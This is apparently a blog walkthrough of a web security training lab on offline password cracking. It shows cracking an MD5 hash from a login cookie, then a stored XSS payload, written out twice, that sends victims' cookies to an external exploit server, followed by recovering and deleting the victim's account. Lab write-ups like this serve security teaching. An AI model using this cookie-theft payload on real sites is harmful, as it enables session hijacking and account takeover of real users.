We are continuing to discuss authentication vulnerabilities, and Offline password cracking is a part of authentication vulnerability. Today, we will give you a rough idea about the lab we will be solving. We exploit this vulnerability through Dom-Based XSS. Once we find out that any application is Dom-Based vulnerable, we can craft our malicious payload there. After crafting the payload, we can steal user and admin cookies.
Lab Solution
As you can see in the lab, we have our own credentials and the victim’s username too. First, we will log in with our own credentials, which are Wiener:peter Offline password cracking.
When I logged into my account and started analyzing requests, I came across a request that was Get-based, ‘/my-account’, which had a cookie stored in the ‘stay-logged-in’ format. When I checked the value of the cookie in the inspector, it had my own user’s username and password stored in it Offline password cracking. The password was encoded, and to decode it, we will use a website called Crackstation.
You can clearly see that we have cracked the password, which was in the MD5 format. Now we are 100% sure that our username:password is stored in the cookie. Next, we will log out of our account and view any post that is available in the lab.
After visiting the blog section, when I entered the XSS payload, it popped up for me. Anyway, let’s move towards our main step.
Exploiting vulnerability
<script>document.location='//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/'+document.cookie</script>We will exploit this vulnerability through the script that I have provided above.
Now, you need to exploit the server by going there and copying the URL. Paste this URL into the script that I have already provided above.
<script>document.location='https://exploit-0a9f006f03a42fc181c42be2013500c6.exploit-server.net/'+document.cookie</script>Here is our payload’s final version. Now, we can submit it on any post.
After submitting, we will go back to the blog and open our exploit server.
After going to the exploit server, we will access the access logs. In the access logs, we will find a GET-based request that is holding an encoded cookie.
Deleting the account
When I used Burp Suite Decoder to decode the cookie as Base64, I found that it contained Carlos’ account credentials. Now, we will decode this password further with the help of CrackStation.
I used the CrackStation website to decode the password and found out that Carlos’ password was ‘onceuponatime’. Now, let’s log in using the credentials ‘carlos:onceuponatime’.
After logging into Carlos’ account, we deleted the account and our lab was solved.
follow me on twitter @masaudsec